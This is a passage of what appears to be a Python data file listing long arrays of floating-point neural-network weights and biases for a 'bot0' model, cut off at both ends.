0.9099537317806782, 0.5192798581826193, 0.5433035731432758, 0.31892693240033465, 0.5958118274708657, 0.7085513182987369, 0.8742207407416388, 0.6337042167065458, 0.16636616138587468, 0.8504220716679501, 0.008768137642932272, 0.3321907623718553, 0.015765311237726398, 0.4006268307494729, 0.7469836643821525, 0.045093765686219256, 0.9096433955085644, 0.5124279588034795, 0.6964588850817747, 0.4374038791902092, 0.40163344846981086, 0.0940377405456091, 0.6803775245970893, 0.952317581061096, 0.691848235447643, 0.630578647708489, 0.8803971658026046, 0.6829989674904294, 0.8303852718262916], [0.8090896331138463, 0.568366177190997, 0.588392706486379, 0.8962719606235023, 0.7516176977640856, 0.11641440386576374, 0.6270061849498927, 0.20116874019401432, 0.41949899074826935, 0.42172508036185496, 0.35500875170630464, 0.8198113206428315, 0.4143612440838118, 0.5646999651398333, 0.500621781434853, 0.6730554787535333, 0.8324057520098505, 0.31964878903806204, 0.9779807164727368, 0.5822250796671027, 0.15497205921042223, 0.3780304127482307, 0.02037115591412353, 0.3476170132717161, 0.822824867866419, 0.9493001838092929, 0.2438705052715715, 0.7753271558007888, 0.38854367293859127, 0.715202932486102, 0.21421508704378023, 0.09401032910240137, 0.9138708442333195, 0.2697944885033273, 0.23794763906014937, 0.5413753067453412, 0.8355480831490287, 0.9665224008673267, 0.6232694765650074, 0.06498840313949972], [0.5246761862676133, 0.4754011429198042, 0.27712677192315793, 0.4395190365983982, 0.291612870302828, 0.3501510795261674, 0.572915107210903, 0.7490730211846306, 0.7604295301424613, 0.98962279751706, 0.5255422834494755, 0.08682114851304945, 0.0878966834429652, 0.5100794436351748, 0.06840872671949483, 0.0757168020683745, 0.7817354416177815, 0.3384416035064336, 0.7866604801454969, 0.27148384787217794, 0.5038003543908567, 0.4220762702765788, 0.9727594676880867, 0.08376945828416726, 0.5009847168978322, 0.6443338586086254, 0.8985585378443358, 0.8508693545537778, 0.4953378231278688, 0.5951550518812834, 0.9982953691635114, 0.5442097204468094, 0.19642106345196886, 0.8285870020719087, 0.9814792369958638, 0.8832319479979229, 0.07124900927191258, 0.09314418893683929, 0.6063864613427206, 0.8556553182464312], [0.09266230824170774, 0.7501756703687169, 0.7013863219730868, 0.5999082089908239, 0.21381797354355636, 0.9312139338924389, 0.047565550857798566, 0.12691735700960138, 0.021049112565388994, 0.1255737126910973, 0.43664400071478626, 0.1899855084546127, 0.7294932551638953, 0.28813104706521786, 0.5787777744250122, 0.17710975282007368, 0.7848352851534642, 0.4499915374894231, 0.9804009556884624, 0.5196235233891956, 0.3999290401672174, 0.6532305184050742, 0.22360698287572, 0.5866552011682303, 0.5743532924688247, 0.7683510611336455, 0.8265073265863738, 0.8502590274280851, 0.41429839881021513, 0.8749331337906685, 0.7910744561008175, 0.4417003321462504, 0.596194239102995, 0.4933194215575557, 0.13580007405579086, 0.7902386848382016, 0.8263312577868199, 0.5599769562713117, 0.15903241458711026, 0.914710505295524], [0.04274754755877619, 0.890363501626485, 0.4462670540122693, 0.2539674962670524, 0.021190779640992252, 0.7268565314944679, 0.9604580404188324, 0.7304129135176844, 0.8619533232684793, 0.47497528151081025, 0.4783731781457279, 0.389440422516651, 0.509359763351526, 0.18760319057403507, 0.9152794225344036, 0.34660200887237536, 0.07896035136023327, 0.0643853106530643, 0.5302211374511594, 0.0888369078482032, 0.6273744926857362, 0.3954652022486038, 0.8573658904498885, 0.9726216432067643, 0.49781685935606357, 0.9881697178035863, 0.19394557506264098, 0.3005335425071226, 0.8063863366198073, 0.28148403104541, 0.756637598395929, 0.8625394353088816, 0.6076963354013876, 0.362899306775733, 0.7555980687264481, 0.004435128999818239, 0.4902779414264228, 0.2276220359584633, 0.10261717299120532, 0.15053172474296994], [0.8491689675500838, 0.08576845757310914, 0.7315120436796695, 0.33370388357766245, 0.6763541302843331, 0.953192212147401, 0.5163443619889609, 0.49595197832710214, 0.6337426437075633, 0.38620259824379, 0.8112143535707623, 0.06803841358353269, 0.13257369251081963, 0.3838463309451251, 0.6733099393710062, 0.8993854404534889, 0.9935789986015777, 0.10117253085315148, 0.5241667385219765, 0.28332460486010747, 0.5300384284154902, 0.020851912231922287, 0.2831935966660998, 0.7290772888806515, 0.4844878468759999, 0.1919539821638775, 0.07158900467312379, 0.8345308822663333, 0.10595626070438391, 0.14115086211277383, 0.4022674697011406, 0.7276474319460647, 0.7740819409818074, 0.10264594367751478, 0.2729389069011442, 0.8406722666818922, 0.10707411449043314, 0.7216539390871423, 0.3921759143708714, 0.22112722804641416], [0.09381743226127937, 0.684091309519585, 0.9827332217216279, 0.15830830501548487, 0.5592245956215205, 0.9596684459186227, 0.16652394729932507, 0.1639883621524837, 0.8380027723761255, 0.19381897907910606, 0.7493793539575553, 0.46816985471486827, 0.5550972914515669, 0.43879788207822956, 0.3269888590213187, 0.2856616459905589, 0.3242963127332841, 0.12090348263621353, 0.15718208047514026, 0.03669496048171317, 0.19182263498184038, 0.924890216846385, 0.10933121122797029, 0.48149661135575483, 0.32113143473803585, 0.4870187661500788, 0.2086877188815659, 0.10101216210989461, 0.2333687259391649, 0.964269858160798, 0.6033308965192875, 0.004601250669507229, 0.4978756588199824, 0.020015721471325354, 0.3410020234950849, 0.02655138305705118, 0.34757319142042775, 0.02286370076800015, 0.3174841781842609, 0.7303439311767911], [0.7744506333134157, 0.1046049178732773, 0.14923426068798773, 0.3349728801978594, 0.10630864596704626, 0.11345530910524704, 0.9621631156410595, 0.23278888601649217, 0.9243040678307289, 0.09207744195892542, 0.022008337716384996, 0.8986727228597363, 0.35962971511824926, 0.8385269639297314, 0.7887108096467702, 0.47848094545776143, 0.3024621790891804, 0.3192308634868608, 0.11871669760025483, 0.5805003989370491, 0.3663753756745537, 0.10426879891641594, 0.5933528005787578, 0.594642975821688, 0.5563701741361995, 0.18969898614461034, 0.13259784241245032, 0.08231995549144955, 0.683085918693767, 0.03259705798511725, 0.8214168833888488, 0.4416694520019878, 0.10305252352626992, 0.24325046321035915, 0.9473216445709998, 0.008472930586119198, 0.7918173930679708, 0.5205644413497853, 0.8215529000048032, 0.3402958611124167], [0.9286116203023213, 0.38721273349732777, 0.8888301429519135, 0.9748382511937258, 0.21494984565439867, 0.15627364253114928, 0.3863098989196596, 0.9680373713836984, 0.23037256719173782, 0.41898825403971607, 0.7688036877056201, 0.12419758474519382, 0.8147273526990039, 0.5340674350975279, 0.3838160293764944, 0.9277687670697762, 0.5855688704039658, 0.9791723736795088, 0.5049570105610223, 0.5278026508651352, 0.6186416923924916, 0.8498150602248935, 0.19951464175087663, 0.753362754515266, 0.9364780018013896, 0.49576764734646417, 0.690116880462191, 0.6506778706316467, 0.8700539680873687, 0.4032430282349684, 0.09905001310404649, 0.24880203444549132, 0.22627483943337534, 0.29022371076137177, 0.07745777633695161, 0.6295089575058374, 0.22606277338470926, 0.7229643988452088, 0.024875314250370706, 0.9927967845547736], [0.4039806458149495, 0.44742995074214387, 0.28296382221341054, 0.7936294647745615, 0.9668900672786176, 0.5330119668769064, 0.866586550889021, 0.5105228277768916, 0.3067122449969363, 0.9097370347506772, 0.608488507195525, 0.48459294969941347, 0.4117062853169585, 0.6316425107733616, 0.34895570331837655, 0.7797265785232883, 0.6262989072693582, 0.32729717085766297, 0.001542481832736864, 0.8248181424888651, 0.4008508801383429, 0.9159097322704373, 0.2041858713170579, 0.548005858871324, 0.7133974117205364, 0.35443661642301083, 0.13366457841455603, 0.09096511029859067, 0.8971724597204428, 0.2269057842065687, 0.8286848514417559, 0.9793538689764325, 0.2823933629803702, 0.03777174578683451, 0.8852384928927112, 0.882891685815501, 0.8999635182501053, 0.8900693806743305, 0.35265537137140013, 0.20870639733171548], [0.666182867169213, 0.5466551783359995, 0.6699350921265178, 0.7111843015831332, 0.8105621986054513, 0.9450272872482796, 0.7107842148363458, 0.1872490228303877, 0.8295116276231063, 0.13644930953662726, 0.11757410507394339, 0.5934293090694761, 0.31768567026270167, 0.5011213485863961, 0.31941196394290194, 0.29954757006835664, 0.47450576418293355, 0.45054565378934297, 0.33774547473622074, 0.33657045142022923, 0.49322997134256175, 0.6874713527509797, 0.6483837633093413, 0.7075837767401462, 0.75681580589286, 0.689633801660392, 0.7744726800439359, 0.548198305013008, 0.4323706150906568, 0.8201856306208845, 0.8355771214707999, 0.9747623659656948, 0.058568265547960574, 0.2598566200316589, 0.08718095846727236, 0.6402600057142442, 0.007338613487693713, 0.7945974869661111, 0.983419215053928, 0.7726449986141048], [0.510881563985941, 0.7721654920914746, 0.9146982279422192, 0.8816965545774509, 0.9429692826257653, 0.12727443505520752, 0.20842822809308093, 0.42652248469530096, 0.016768368283273216, 0.43809066421074194, 0.12687104675349914, 0.6468074551094772, 0.9674579797553892, 0.5540523420890983, 0.14702395683967784, 0.4190069286359057, 0.9683458400464705, 0.49123090710627604, 0.648205292714437, 0.19809035023851596, 0.7283330652034565, 0.6058526754343619, 0.7149790489848675, 0.5888887314095956, 0.29255101311237763, 0.9454791070671928, 0.40255961895792525, 0.5892559782715333, 0.07462886046582573, 0.5974160304905439, 0.7692569752137837, 0.28385249538066015, 0.17893121543595725, 0.5062907691797828, 0.15631164241584083, 0.8721053940210177, 0.7417732869222234, 0.9963016193864281, 0.7911831384889905, 0.5795913199944962], [0.09043579321062079, 0.15727858890572655, 0.19502035106319315, 0.24406938021459001, 0.4352898807882579, 0.7424569515330994, 0.7785985981122928, 0.8689424469152366, 0.3260426031734943, 0.06740361274574425, 0.35939001185834873, 0.9335660207798734, 0.9464239221587253, 0.43574605781991493, 0.44284790785709593, 0.9347311050184343, 0.07666921908673752, 0.4424917307802476, 0.8239898422260858, 0.11799598214685059, 0.637851702557915, 0.8854521382598126, 0.9770084789905045, 0.15149581828792658, 0.16405451817980832, 0.8800455720240121, 0.7135028884089607, 0.8218323815245602, 0.838354605992176, 0.204274189164253, 0.6393701071881613, 0.8436824163207585, 0.7735298612505432, 0.516483285518135, 0.08689307134960211, 0.9231844851486531, 0.9655007608254343, 0.9213258340794077, 0.8450436259259676, 0.731234761959281], [0.2219746708118695, 0.5297795994286242, 0.10931873750495047, 0.05169661655303015, 0.5417487195747623, 0.051985637135126606, 0.6151270740217628, 0.5950907235927987, 0.6396819970548321, 0.486335073235587, 0.9033136742599506, 0.609830902843371, 0.6825521819207603, 0.5737692741513681, 0.241169550119271, 0.006541767049585312, 0.4832366281574322, 0.04175111374507967, 0.7364770352604144, 0.29168163004560044, 0.04414699093348029, 0.6914152611160199, 0.8315979403864622, 0.008150733979168878, 0.3287972932186086, 0.3854940612753289, 0.016457104841191672, 0.8468638595700386, 0.7724282172501084, 0.24635030084333553, 0.4900161579696386, 0.1552819348709631, 0.8226205897411606, 0.1413540626898081, 0.9619170400813458, 0.9865182814079577, 0.5146392944026943, 0.36090429692649584, 0.5869204032228983, 0.21240826907944943], [0.37913816643976506, 0.12642024996582957, 0.7104728022952082, 0.6401661630051931, 0.46628919018540316, 0.5813438971466577, 0.38344649577718215, 0.7011352935231818, 0.9402298085678615, 0.6074284627928613, 0.7670579595369482, 0.5609530327356567, 0.33928823496533655, 0.631152725352499, 0.03501378748631634, 0.8739682481659181, 0.003237810727759971, 0.2927013850209301, 0.0420559549239381, 0.5412011478055372, 0.7021965719981249, 0.5774599097223979, 0.5908846805767635, 0.6649136106576253, 0.8466192711180195, 0.18548944123987454, 0.6623685954183326, 0.07472068468136195, 0.49717338209086126, 0.08231911863322572, 0.566695461309684, 0.5640546903015857, 0.579527069733132, 0.4554107205650547, 0.10336438427737749, 0.48552957576147093, 0.47931229371145023, 0.6336048050779687, 0.8377753289829373, 0.40584396101116416], [0.020931066043987534, 0.7693612051913421, 0.5020564399329285, 0.5415584403568868, 0.010987082522099234, 0.7913462829071669, 0.5716841584491845, 0.06501050948948484, 0.8315805282944826, 0.3892967916998421, 0.39542465785192904, 0.36336094818729703, 0.013890618460810522, 0.7928378092777397, 0.10603757076346432, 0.96308052597039, 0.8898156598070234, 0.8159038088716472, 0.2846186640574878, 0.6644493758364706, 0.34131185449934176, 0.07356955353712857, 0.5702131444637452, 0.14075461241884435, 0.9057765925274222, 0.312864332564193, 0.6417627255177022, 0.8580845535851801, 0.22558710275771932, 0.15124418194168143, 0.7069909984216061, 0.17315425764132042, 0.9889509316752451, 0.1531040167694604, 0.9102847498564701, 0.8503212872680526, 0.5825275057813811, 0.5844888859188019, 0.979525732164681, 0.26424675793622965], [0.09120387730318658, 0.455742681177442, 0.8526518178794467, 0.7062616650789587, 0.22722453490382244, 0.2210199337208847, 0.5737319472158511, 0.08060752406773763, 0.10481725778924245, 0.5175202211114157, 0.8334939932904504, 0.5903049252320582, 0.2285259651586211, 0.7249939913372211, 0.23193589587190466, 0.3456043837060758, 0.05245893750148056, 0.22962794486791338, 0.41653350578699, 0.45100683012539433, 0.27338139274185425, 0.959431159089695, 0.43767104155505465, 0.9894814487208242, 0.658375526506583, 0.9273752617789098, 0.2295374999023163, 0.7649617018314054, 0.9469282856605002, 0.6298485188429842, 0.3829487821770633, 0.3980286586924491, 0.3093060927992902, 0.41733619782802756, 0.4515946997938127, 0.28946771167626484, 0.897267910958899, 0.589912902398637, 0.6241364279803275, 0.1036378670840915], [0.431207223030749, 0.9313889261276478, 0.5384534503066498, 0.4881506158081028, 0.04203051234748012, 0.009241966347972586, 0.23582130424236825, 0.5756218073308466, 0.723189482983854, 0.05301789999696671, 0.27644498357021596, 0.16417516749837402, 0.4050414550422069, 0.02276732818962479, 0.01703752181457574, 0.25739442887080954, 0.761665149879539, 0.7253983835750119, 0.2650051039705337, 0.41423266383976376, 0.2575137851659993, 0.27047117120688713, 0.12089321637978456, 0.904672560100186, 0.18345893957518444, 0.6411513722478539, 0.783693971847707, 0.042742458193551824, 0.2148263540535461, 0.1496844570774828, 0.4954664999256404, 0.8798874294942094, 0.21565654875320184, 0.28474920082638533, 0.06275251605567989, 0.9804817138676442, 0.7844659328704713, 0.43136206303891644, 0.4292195212786276, 0.20857137193472353], [0.3415512179326151, 0.6764104789890057, 0.495354122379814, 0.6863804088585107, 0.26964406295673704, 0.8020416739961985, 0.8824904102266534, 0.21187338596010674, 0.8349794157835084, 0.23458739649330163, 0.5972086492952792, 0.10294365057103994, 0.6251128263807871, 0.23638138472911108, 0.56619862089623, 0.8602680270941357, 0.9620746716455474, 0.7470837452081265, 0.5544113695525673, 0.2988906285618196, 0.1395806209891004, 0.3961941203003272, 0.22782489779100756, 0.018601448291538425, 0.29138914945670347, 0.8672698099210076, 0.39149144304430394, 0.851277533698289, 0.4732283177127583, 0.9662825075946619, 0.8483420134394011, 0.2960395194116284, 0.33131928903757935, 0.844045390492021, 0.19637286224017503, 0.6869298570203961, 0.9510785336935428, 0.5029709166915196, 0.5791115040203375, 0.033842415800878545], [0.5075113689730725, 0.7008729234379416, 0.7840432647238358, 0.8981020621679869, 0.6384488750509538, 0.02534646636992144, 0.9254658826238548, 0.651152879679794, 0.03924665637160074, 0.7923807333544127, 0.945211338913243, 0.6668594671186614, 0.7951907294735059, 0.24053890879249562, 0.12594883989504035, 0.48252575340764947, 0.04592335108380663, 0.6580125216965366, 0.06747615328897116, 0.9422207609316988, 0.6310616379068102, 0.7324872095535372, 0.012055168742231448, 0.26457427770409425, 0.018575507810084102, 0.7633836142370064, 0.7441892988877095, 0.511641692898776, 0.9761065130955261, 0.41103721514452096, 0.09172544146110817, 0.8705066141379731, 0.6915407409483096, 0.35131120060548526, 0.3513271870248348, 0.8343943951662393, 0.07088358183730648, 0.9222791736993147, 0.23888758339197513, 0.4569279801283621], [0.2531874067610984, 0.8804480761473711, 0.5926667953651851, 0.3086647343341855, 0.6478744227263935, 0.5021295088824722, 0.10513666701340063, 0.712583577850166, 0.7798423787878452, 0.48890258009128795, 0.7194975524652997, 0.16267979706218882, 0.7078561604943057, 0.4827362802106677, 0.07712323130166887, 0.48753285261709056, 0.9934829260824676, 0.5602575686606993, 0.8003320497453161, 0.85903673844661, 0.9947438042286089, 0.9435932101269706, 0.18649152103828337, 0.502545646745528, 0.024405551377403523, 0.10314169427640119, 0.26106866160998277, 0.596601477259551, 0.73639839036458, 0.0575276475864438, 0.9101178833219197, 0.9311824526761551, 0.14361330802427474, 0.19487384015237608, 0.7908531875965357, 0.3651463454551753, 0.17583056889288806, 0.15329507361766137, 0.7374685286362075, 0.2662991395494052], [0.1344216956960128, 0.5007177799915079, 0.8904115637774512, 0.5798553709682275, 0.40033566344361815, 0.21857647614254405, 0.21261388059380038, 0.4705193569245596, 0.7853767423946021, 0.11605406446733002, 0.6407095840447491, 0.07780582205577313, 0.2943426627046284, 0.6338083321021053, 0.956668102247972, 0.40007854199046666, 0.34788174513699044, 0.26204614917534663, 0.4529553409493098, 0.009009988493946852, 0.627035533168727, 0.16201894556668228, 0.49425939937108343, 0.4498756523484694, 0.840105279435422, 0.15479808928903127, 0.9211851539031551, 0.5330209252302638, 0.3747279979346121, 0.7552638958779772, 0.6024839887932808, 0.9228202507512663, 0.4570210485756221, 0.2362802673586628, 0.08910544420220623, 0.6014460964478587, 0.9250695838880614, 0.756326843273155, 0.3147482350837961, 0.8202616028185885], [0.33590447881562135, 0.4007402501408569, 0.16813485544180085, 0.2460835845191719, 0.7751493489209615, 0.8378555411394488, 0.8665469251374396, 0.33866620418728055, 0.4795530891354499, 0.45760000387041855, 0.1528728916836949, 0.5826364431257827, 0.8442270177354942, 0.40161813660398027, 0.7331381596768767, 0.2174146644910444, 0.007195641861198143, 0.7729281980022203, 0.747445457857178, 0.25537939510659347, 0.4941473273159547, 0.36425060255423336, 0.4073362683241889, 0.8612885533059496, 0.5350088200342898, 0.059378864035761536, 0.14488632522470357, 0.6105795087908726, 0.8927210539043693, 0.041722797244169496, 0.34063628059064943, 0.9939513050453366, 0.9025290987140709, 0.7260260605444951, 0.6770873147786107, 0.1230647133053725, 0.5104957162580814, 0.3155297541502543, 0.7024106413605149, 0.14484919498540272], [0.4881101233121684, 0.41071476649256566, 0.16273174243948885, 0.34092308692173623, 0.7915407193129415, 0.008307662621660827, 0.20620539051476783, 0.41042960651879823, 0.8176918361009802, 0.14281250500406495, 0.9611294668351972, 0.638072256152111, 0.6405056649060018, 0.12348523479795659, 0.6988669653476488, 0.1801036388888747, 0.160031142862897, 0.5154796184435111, 0.1603922534659974, 0.32169492093551133, 0.42019764364313106, 0.8327290382740076, 0.6453534125000819, 0.8503638354142109, 0.16075723452081125, 0.9660791612482171, 0.1814851099891236, 0.4860986570456407, 0.37610810037479037, 0.9042036948607018, 0.7146296500840329, 0.1818539332222241, 0.567907770071545, 0.7404674217682802, 0.12308605366048375, 0.14209480743832892, 0.9642758805048992, 0.12228125705853865, 0.9168976009322206, 0.438190610315934], [0.6143818807492392, 0.05189205129326668, 0.5813604120651429, 0.9263203402763487, 0.07951042780113471, 0.08368894943308758, 0.5366137259011795, 0.4843694158337145, 0.7258838455339754, 0.2536410223964446, 0.36820096734578656, 0.056661212456568744, 0.5989730512912881, 0.8299732802825837, 0.21395137747606396, 0.6457393796643329, 0.4696235651574533, 0.6963353742412026, 0.6969155938917959, 0.6965924125825453, 0.6319791982215727, 0.5044562338985711, 0.5356001206521024, 0.9005536720964442, 0.42042911861951815, 0.8568299662381711, 0.1154383403482061, 0.9952083946108532, 0.5960247110141472, 0.41594379091434774, 0.7893067264325313, 0.4000170869219999, 0.8126611886738974, 0.14310699038605024, 0.10889541074675313, 0.13479426224822333, 0.8456880744666728, 0.18862628630126188, 0.3215912607090585, 0.5499366839568469], [0.45487669400732866, 0.7636519291724719, 0.9044383638845601, 0.30660347057615367, 0.975458607834666, 0.5365835577003023, 0.7611686039509037, 0.3293428814757414, 0.6357765421155, 0.031007382812284434, 0.4273084245524369, 0.824770830273977, 0.07818181914495337, 0.8501023197330511, 0.8093957168704089, 0.8000276355707528, 0.5897434602968332, 0.8010065352161336, 0.05514189563398175, 0.059322896854843044, 0.4201405171182324, 0.6966954510192541, 0.9811282381691626, 0.6785180238295281, 0.6044126365028397, 0.11021491853736898, 0.31568829160890455, 0.5303016773261048, 0.33984672623591605, 0.43038567700886143, 0.1212146445620722, 0.5244758915617389, 0.1654204707619692, 0.8306956581539089, 0.9407448463164394, 0.9750105461263899, 0.1481879156137872, 0.966788581579337, 0.2298791107255913, 0.19699316263071476], [0.8358037283396489, 0.41756738422617523, 0.30037595485298685, 0.505587226435338, 0.5054851169187434, 0.8818824100969341, 0.2202516109143834, 0.004984872538747909, 0.4135357085347674, 0.4264533071138237, 0.7078577270777933, 0.16817374180519118, 0.29143940730004725, 0.8236529488014616, 0.47319007232125376, 0.33395835251500106, 0.6005045910444272, 0.7406643574744549, 0.8833099680782208, 0.05103096002786578, 0.9804701065673899, 0.053986722914696306, 0.23976390624434596, 0.24087800814380478, 0.6180145658165601, 0.15719292374577065, 0.8064023162904874, 0.4659598270139428, 0.9535780415484715, 0.1309925730078063, 0.0632000938650048, 0.7977428066062019, 0.5845820749030616, 0.6541950817179976, 0.2867590955273608, 0.5505426647997695, 0.9005597908499927, 0.9734175446995511, 0.6246751545115254, 0.2344717947090572], [0.5898981547380391, 0.03965883972796114, 0.24159428382831227, 0.8769846167837184, 0.6640820472012455, 0.32788687219599466, 0.07384128837768245, 0.9019356835476171, 0.9682950456661968, 0.5831188917083061, 0.5525416867804379, 0.6711372999816885, 0.741243824149109, 0.8901751964866755, 0.44590515089258365, 0.5099820931202883, 0.18004308958655835, 0.3022418390264009, 0.9378090379721243, 0.10524453441196424, 0.6895800835232304, 0.32420118549546273, 0.05451342843682827, 0.2510804373338231, 0.1395726070421044, 0.39772438971001967, 0.6607757844006914, 0.39446155527946214, 0.9219412026330176, 0.39313105035377804, 0.05893292586049681, 0.7640646599902158, 0.9642161727386028, 0.384052252351508, 0.1517702097031116, 0.1738299244582041, 0.3925219680137956, 0.2796199471557075, 0.7730713863262959, 0.5290854011455963]] bot0_wieght_layer_two = [[0.7924608499157508, 0.5533019807509733, 0.07842539598896592, 0.13059942670251723, 0.21994960485591653, 0.06602604179885252, 0.2984874961318884, 0.02311956694570738, 0.3795625133528373, 0.3228123010817604, 0.1459627414393977, 0.4722447812402685, 0.7830699141689073, 0.9280056071960512, 0.7154751421490831, 0.2845590414332202, 0.42673472449969707, 0.16801672697781056, 0.4342490763582669, 0.8806689340032496, 0.2712279244309813, 0.9965995752627571, 0.30227780611623745, 0.2447194490633301, 0.11180264703436904, 0.496843509240413, 0.44389950511618825, 0.3747600504188695, 0.18998912023351266, 0.8697165479518629, 0.7358884875814429, 0.7357390465068545, 0.5971660015633152, 0.8858923288437276, 0.8561267361445972, 0.09187542200057675, 0.0011519641717783191, 0.06765276835184342, 0.7049447532474103, 0.6571469122639081], [0.6353314913187238, 0.5066627093634036, 0.45694862293534544, 0.8013877478578474, 0.9018853871665707, 0.513448066290405, 0.35238831046968744, 0.32117927928850676, 0.4254322310824109, 0.7432355591440651, 0.4538458305967823, 0.8485881616842691, 0.7929266142844223, 0.18336855397548957, 0.9329907108878449, 0.3733043918691539, 0.16115862069646414, 0.8702790759096, 0.545602288823806, 0.8434093145738594, 0.4076147443386855, 0.018914240649326453, 0.9082616110081991, 0.4393061983364057, 0.10312642014652318, 0.07009106020334088, 0.37061757833494113, 0.8510440791124326, 0.7818578435079506, 0.0684654276895289, 0.6697774886328678, 0.9937800549245825, 0.9933179473062644, 0.96591873257431, 0.3486414014247061, 0.13364658977396493, 0.48892169436751964, 0.39131015083636067, 0.18456436613584115, 0.7273046275338086], [0.027090989373142915, 0.8405222655426425, 0.8737670710797781, 0.4446050004997979, 0.25962275893438524, 0.4172117578568266, 0.6042081334007412, 0.6275682865973066, 0.8686796638122195, 0.9039720980065536, 0.6469892940088353, 0.6565430697168501, 0.8485900814355686, 0.8292150478384595, 0.12105265824833222, 0.04552012944640105, 0.49405654679583155, 0.554210122715284, 0.4703931195385931, 0.6469517092221198, 0.03224294683521023, 0.3056125922815588, 0.5547634669986748, 0.9683979465399061, 0.5988615386931472, 0.97939881197661, 0.9085514665631925, 0.6061520558056479, 0.935202691092468, 0.863039207575379, 0.6579717180463207, 0.15764778410578895, 0.8603411339474845, 0.05502237592766601, 0.6793235712276698, 0.958795451643341, 0.27240623185987756, 0.10826627929048349, 0.3877540308105024, 0.09136282915817973], [0.6004677891161132, 0.033580983629784456, 0.9714133815314732, 0.7373741338392421, 0.7119258387663442, 0.11352024552649498, 0.45168172875396073, 0.27102632287248574, 0.35621935723543874, 0.291706702502447, 0.25094405062339287, 0.22638881016185775, 0.9392444765016329, 0.6773130776980483, 0.9654836726164856, 0.6502843263229239, 0.9385186370504787, 0.8214662746390888, 0.47770883639944306, 0.2953008024534969, 0.39819884063921707, 0.23860128518127688, 0.6566563405546643, 0.5527896889819153, 0.69077281393274, 0.6967472340646969, 0.6298121815610134, 0.684147664543683, 0.7049721113371529, 0.8598950032203031, 0.9633523239707148, 0.35089007627014657, 0.043767925663634855, 0.6359488424540123, 0.9938927406096162, 0.24191520040909642, 0.08367978763357597, 0.11599254132305603, 0.5967300042490618, 0.256662114330232], [0.7024385277210782, 0.32877853416699276, 0.8739021892693426, 0.893200989802283, 0.9335961253195939, 0.3790057245786844, 0.5180881076969663, 0.44565813065775184, 0.24428191054816628, 0.8790945771921924, 0.6270154185543578, 0.747093553999582, 0.4885447217527966, 0.5097660412958194, 0.31230194357616947, 0.5578282179447789, 0.09159564250036933, 0.621565614668811, 0.764366061532641, 0.7390174098157766, 0.1392348131957052, 0.7387024890082716, 0.2578476042020995, 0.19074562662747951, 0.1609056604345871, 0.1342283792786778, 0.6671386682982525, 0.21353507638338765, 0.392090621411078, 0.5206753046865467, 0.10585981773093023, 0.37686727091952665, 0.8688325329202707, 0.8848476820963005, 0.4194686788619777, 0.14017719382076244, 0.9617665529874843, 0.03666644643752415, 0.5155907708033867, 0.28146358790876624], [0.7790526301453559, 0.329137579348991, 0.6406343703472495, 0.9328921579626067, 0.6744053047110395, 0.8445693375713933, 0.21641880042442907, 0.9552513574304115, 0.46991817488444554, 0.0031699563763590843, 0.5159099793412398, 0.2723125046097187, 0.8116856555738962, 0.5663105589593875, 0.8433174463730233, 0.30216196599113654, 0.5586163215643194, 0.12618920847817128, 0.37544419867770895, 0.6978637887091959, 0.1388224973375245, 0.9708303042167001, 0.6141233513490831, 0.9185911212174693, 0.23171653367072165, 0.9958411887348882, 0.6792072521930418, 0.20949237067716875, 0.7968320459418277, 0.32851054696057236, 0.6434176865699571, 0.968006044645234, 0.7727458311527614, 0.5223878847743492, 0.994703663869293, 0.19877113024880622, 0.2925349418277413, 0.13420486723335434, 0.35529102433832727, 0.02132014210962574], [0.8217485412993956, 0.7955986788335634, 0.2096615386324795, 0.517728730293321, 0.3100598219090861, 0.13340194208887457, 0.27108074737266497, 0.001417007983217533, 0.2284968386889783, 0.2611332972121654, 0.5696976552520397, 0.5525009075216284, 0.018502003115828614, 0.6319939313401512, 0.6268886925727343, 0.8922729091060876, 0.47739673947891037, 0.9684694726630932, 0.8588310498910229, 0.8146478278669018, 0.02841245101133305, 0.11799006897778752, 0.14349733010310672, 0.8732914428512268, 0.06379224264029759, 0.615501432154755, 0.2175271594488365, 0.29876635475845637, 0.07608110833910353, 0.004609684417057336, 0.8860297209862968, 0.42823539322110715, 0.6569881167939803, 0.30994708828716955, 0.13019180395420604, 0.012345557207740998, 0.04496176757748116, 0.30338819308116194, 0.4003366858969054, 0.44178099086549283], [0.918930768142277, 0.33011291931116227, 0.04215116750445558, 0.17090849961858579, 0.31938590191056904, 0.884357139400469, 0.053150056810457036, 0.44332594728134933, 0.49409541582132654, 0.8755504549852291, 0.5864579367029081, 0.09518867817599996, 0.8044681230006583, 0.2050719816305817, 0.7815995619320844, 0.47154539437149867, 0.5852725700010055, 0.9729866007408048, 0.003224018318599975, 0.9326243972471693, 0.27876428120131846, 0.32555309101651175, 0.8031969073531952, 0.035711339644172946, 0.7500275403784555, 0.6389598777555459, 0.31328316358503483, 0.5637916250202911, 0.8966986763519509, 0.36673639876687936, 0.6509813957442601, 0.8301821682528858, 0.7968374740887644, 0.08513319883590631, 0.8175578813911143, 0.9124735531342681, 0.42841714668740793, 0.13223458927413312, 0.1321862759053981, 0.15597474720482396]] bot0_bias_layer_two = [0.9709523793038841, 0.3197347987576674, 0.4152985357733182, 0.7636165162869605, 0.17114740133673256, 0.6530871124156804, 0.9500677843219679, 0.8219432211803281, 0.361412967960291, 0.7630518529452371, 0.19893721282699595, 0.9184052050867298, 0.201185411073872, 0.656049852057201, 0.42806340050924774, 0.09221887067818768, 0.6920949534780607, 0.5639890330123942, 0.5961727597552606, 0.9174175646934064, 0.8730574112223339, 0.3060328361793859, 0.25464840086292684, 0.796467740988258, 0.7550012486168034, 0.003986448554077593, 0.0720218935127327, 0.4682381810407714, 0.39318020373897933, 0.4157842964202918, 0.7146597689977428, 0.9224098617233942, 0.5102969857273174, 0.9788330654858486, 0.5964186912399583, 0.33407788766793467, 0.4164945021221308, 0.36879798185946244, 0.015002096670957199, 0.43922048798573377] bot0_wieght_layer_three = [0.678485011995479, 0.6769019214693626, 0.13296323001225896, 0.408344686947429, 0.9918760430741626, 0.34458727890181484, 0.4018491030743456, 0.7252321966543048, 0.05551037367729328, 0.8967911004988389, 0.9224823600805313, 0.6672094345521605, 0.5282749268240046, 0.13028823903676823, 0.6905990354054673, 0.7979344714101553, 0.8210146216963327, 0.0606297783004468, 0.27117570769535704, 0.18232110425656634, 0.7247000496335553, 0.876864532784838, 0.4515745719355879, 0.5184986131840386, 0.6619375597052585, 0.1633617202688057, 0.9199819012927225, 0.6623250842194767, 0.1989694378696648, 0.9044191016640872, 0.6773001456109496, 0.5642309402203227, 0.8450298490634149, 0.34856976397462947, 0.2960010405066179, 0.5278429975374965, 0.2721287819813696, 0.6573157709647922, 0.9674543251893654, 